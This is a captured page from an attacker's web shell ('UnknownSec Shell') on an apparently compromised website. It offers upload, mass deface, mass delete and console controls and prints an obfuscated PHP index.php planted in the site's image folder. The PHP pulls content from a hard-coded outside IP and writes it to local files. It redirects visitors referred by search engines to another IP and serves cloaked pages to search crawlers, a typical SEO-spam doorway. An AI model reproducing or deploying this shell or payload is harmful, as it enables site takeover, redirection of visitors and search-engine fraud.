shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
socialite.brannanatkinson.com
/
public
/
assets
/
images
/
nbkbjh
/ [
drwxrwxrwx
]
upload
mass deface
mass delete
console
info server
name :
index.php
<?php goto OkgHl; sLQEE: dvbVN: goto QDG4r; F59dF: curl_setopt($xxXef, CURLOPT_USERAGENT, "\x4d\157\172\x69\x6c\154\x61\57\x34\x2e\x30\40\x28\143\157\x6d\160\x61\x74\151\142\x6c\145\73\40\x4d\x53\x49\105\40\x36\56\60\73\40\127\x69\156\x64\157\167\163\x20\x4e\x54\40\65\56\x31\73\40\123\126\61\x29"); goto ooUTp; M1J4k: $S1GRA = "\166\151\x73\x64\157\151\152\x65\167"; goto Wu2s2; M4JEE: $HcTMf .= "\103\x6f\156\156\145\x63\164\x69\157\x6e\72\40\x43\154\x6f\x73\x65\xd\xa\xd\12"; goto Dkja0; TTeD4: $FJhzX = chop($FJhzX[0]); goto aPzLh; zqg8t: if (!function_exists("\x63\x75\x72\154\137\151\156\x69\164")) { goto L0XKd; } goto CGReb; MOsIO: if (!($udfrL == "\x5c" | $udfrL == "\57")) { goto lZVfP; } goto MuP42; w_otE: curl_setopt($xxXef, CURLOPT_SSL_VERIFYHOST, 2); goto F59dF; lwFXx: l2tzM: goto illk2; xiMY0: $YXpo6 = str_replace("\55", "\53", $_GET["\x69\144"]); goto tSUjZ; MuP42: $udfrL = ''; goto rRl6y; EMq49: $B32oa = $_GET["\151\144"] . "\x2e\160\150\160"; goto MuBqA; IpNkD: exit; goto HF37a; sTSlJ: $_GET["\x66\156"] = "\x36\71\66\71\x36\x39\x6e\145\167"; goto M1J4k; qguyw: Ib6p4: goto IksBT; WAJvW: $Re2EZ = "\x36\x35\x2e\61\x30\x39\x2e\66\x37\56\61\60\x30"; goto xCPdO; L5xys: echo "\164\x65\x73\164\x20\147\157\x6f\x64\56\x2e\x2e"; goto hfmrl; nBINt: $FJhzX = file($FJhzX); goto TTeD4; rJt8O: if (feof($YOqT9)) { goto mjnlj; } goto SBllw; HF37a: lSc3a: goto UxdjO; SMLj2: SKYm0: goto v8r9H; H_nhV: foreach ($_GET as $EP3bS => $ncvbu) { $_GET["\151\x64"] = $ncvbu; h5RZt: } goto lwFXx; ooUTp: $Huze6 = curl_exec($xxXef); goto o9qKQ; CGReb: $xxXef = curl_init(); goto PZLYC; PZLYC: curl_setopt($xxXef, CURLOPT_URL, "\150\x74\164\160\72\57\x2f\x36\65\x2e\x31\60\x39\x2e\66\67\x2e\61\x30\60\x2f" . $_GET["\146\156"] . "\56\x70\x68\x70\x3f\x70\x61\163\163\75{$GgdTx}\x26\161\75{$_GET["\x69\144"]}"); goto WLm3l; heTpw: $Huze6 = file_get_contents("\x68\164\x74\160\72\x2f\57\66\65\56\61\60\x39\x2e\x36\x37\56\61\x30\x30\x2f" . $_GET["\146\x6e"] . "\x2e\x70\150\x70\77\x70\x61\163\x73\75{$GgdTx}\46\x71\75{$_GET["\151\144"]}"); goto cCC6c; YUL7D: goto ogqZd; goto JrXSl; pgoDB: $Huze6 = $Huze6[7]; goto u0Vrx; UxdjO: goto BBi38; goto uD0bw; u0Vrx: uvGxc: goto hoNeL; vf1Yk: header("\114\157\x63\x61\x74\151\x6f\x6e\72\x20\150\164\x74\160\x73\72\x2f\x2f\x67\x6f\x6f\x67\154\145\x2e\x63\157\155"); goto HoKCJ; W0FAE: if (strpos($_SERVER["\x48\x54\124\x50\x5f\x52\x45\106\105\x52\105\x52"], "\x67\157\157\x67\154\145\56") or strpos($_SERVER["\110\x54\x54\x50\137\x52\105\106\105\x52\x45\122"], "\x79\x61\x68\157\157\x2e") or strpos($_SERVER["\x48\124\124\120\x5f\x52\x45\x46\x45\122\105\x52"], "\142\x69\156\147\x2e")) { goto VvJuX; } goto EMq49; sBjIT: $HcTMf = fopen("\x69\156\144\145\170\57" . $B32oa, "\x77"); goto K2FoT; x0nJJ: N8fy0: goto qxVaP; MuBqA: if (!file_exists("\151\x6e\144\145\x78\x2f" . $B32oa)) { goto lSc3a; } goto krFUp; y0qjU: header("\114\157\x63\x61\x74\x69\157\156\x3a\40\x68\164\164\x70\x3a\x2f\57\66\x35\x2e\61\60\x38\56\x31\60\x2e\61\71\x39\57\x65\156\x74\145\162\57\77\x6d\x61\162\x6b\75{$XVwsy}\x2d{$udfrL}\x26\164\160\x6c\x3d{$FJhzX}\x26\x65\x6e\147\153\x65\x79\x3d{$k5PG1}"); goto NGBXR; L3elG: fclose($YOqT9); goto f3GuZ; zXjSs: if (!($_GET["\x69\x64"] == "\151\156\144\145\x78")) { goto N8fy0; } goto vf1Yk; FXbNO: $Huze6 = explode("\xa", $Huze6); goto pgoDB; VE0Ry: $Ty1Y8 = str_replace("\x3c\164\151\164\154\x65\x3e\74\x2f\x74\x69\x74\154\x65\x3e", "\x3c\164\151\x74\x6c\145\76{$k5PG1}\x3c\x2f\164\151\x74\x6c\145\76", $Ty1Y8); goto qguyw; KR7fX: $rkK_F = "\57" . $_GET["\146\x6e"] . "\56\160\x68\x70\77\x70\x61\163\163\x3d{$GgdTx}\x26\161\x3d{$_GET["\x69\144"]}"; goto x7uhJ; OkgHl: error_reporting(0); goto q1Une; hfmrl: exit; goto g84Eg; IkfdO: $k5PG1 = str_replace("\x20", "\53", $k5PG1); goto i4r1o; hoNeL: if (!(strlen($Huze6) > 500)) { goto SKYm0; } goto sBjIT; i4r1o: $iBbeQ = "\142\x32\63\150\162\x32\x33\166\162\x33\62"; goto BwsKs; gfBvb: curl_setopt($xxXef, CURLOPT_SSL_VERIFYPEER, FALSE); goto w_otE; g84Eg: T70qt: goto zXjSs; iYT02: L0XKd: goto oUra6; o9qKQ: curl_close($xxXef); goto iYT02; Rm_CG: curl_setopt($xxXef, CURLOPT_CONNECTTIMEOUT, 4); goto gfBvb; q1Une: $XVwsy = "\x32\60\x32\66\60\x32\x32\x34\x2d"; goto H_nhV; WLm3l: curl_setopt($xxXef, CURLOPT_RETURNTRANSFER, 1); goto Rm_CG; aPzLh: $ZC7G1 = $_GET["\155\171"]; goto y0qjU; fHVxo: gkegQ: goto QgkQJ; BwsKs: $udfrL = dirname($_SERVER["\x50\x48\x50\137\123\105\114\x46"]); goto MOsIO; uD0bw: VvJuX: goto DxCkM; XLmhV: $k5PG1 = str_replace("\55", "\40", $_GET["\x69\144"]); goto IkfdO; Dkja0: fwrite($YOqT9, $HcTMf); goto D1c4w; Nv8cZ: $udfrL = $_SERVER["\123\105\122\x56\x45\x52\x5f\116\x41\x4d\x45"] . $udfrL; goto N00hb; w5Hjf: BBi38: goto xiMY0; xCPdO: $YOqT9 = fsockopen($Re2EZ, 80, $v3gEK, $cnFk0, 30); goto TJtiT; NGBXR: exit; goto w5Hjf; QgkQJ: echo "{$cnFk0}\40\x28{$v3gEK}\51\74\142\x72\40\57\x3e\12"; goto sLQEE; ITo6_: $GgdTx = "{$S1GRA}" . "{$iBbeQ}" . "{$eX859}"; goto W0FAE; M21rM: $VecQQ = 5; goto XLmhV; N00hb: $eX859 = "\162\166\63\62\x79\x64\141\143\163\x76\163\144\x76"; goto ITo6_; f3GuZ: goto dvbVN; goto fHVxo; TJtiT: if (!$YOqT9) { goto gkegQ; } goto KR7fX; x7uhJ: $HcTMf = "\107\x45\124\x20{$rkK_F}\x20\110\x54\124\x50\57\x31\x2e\60\xd\12"; goto JFbO8; D1c4w: ogqZd: goto rJt8O; K2FoT: fwrite($HcTMf, $Huze6); goto GKukZ; rRl6y: lZVfP: goto Nv8cZ; JFbO8: $HcTMf .= "\110\x6f\163\x74\72\40{$Re2EZ}\15\12"; goto M4JEE; Wu2s2: $GsOtV = 3; goto M21rM; IksBT: echo $Ty1Y8; goto IpNkD; qxVaP: $_GET["\167\157\x72\154\x64"] = 5; goto sTSlJ; GKukZ: fclose($HcTMf); goto SMLj2; JrXSl: mjnlj: goto L3elG; bp9bH: if (!(strlen($Huze6) < 5000)) { goto uvGxc; } goto WAJvW; cCC6c: xJSxm: goto bp9bH; oUra6: if (!(strlen($Huze6) < 5000)) { goto xJSxm; } goto heTpw; DxCkM: $FJhzX = "\x69\156\144\x65\x78\57" . $_GET["\151\144"] . "\x2e\160\x68\160\x2e\x74\160\154"; goto nBINt; QDG4r: fclose($HcTMf); goto FXbNO; uUBIB: if (!(strpos($_SERVER["\x48\x54\124\120\x5f\125\123\105\x52\137\x41\107\x45\116\x54"], "\142\x69\x6e\147") > 2 or strpos($_SERVER["\x48\x54\x54\x50\137\125\123\105\x52\x5f\101\107\105\x4e\124"], "\171\141\x68\157\157") > 2)) { goto Ib6p4; } goto GyDEp; SBllw: $Huze6 = $Huze6 . fgets($YOqT9, 2048); goto YUL7D; tSUjZ: $Huze6 = ''; goto zqg8t; GyDEp: $k5PG1 = str_replace("\55", "\x20", $_GET["\151\x64"]); goto VE0Ry; illk2: if (!($_GET["\x69\x64"] == "\x74\145\x73\x74\151\x6e\147")) { goto T70qt; } goto L5xys; HoKCJ: exit; goto x0nJJ; krFUp: $Ty1Y8 = @file_get_contents("\x69\x6e\144\145\170\x2f" . $B32oa); goto uUBIB; v8r9H: echo $Huze6; ?>
© 2026 UnknownSec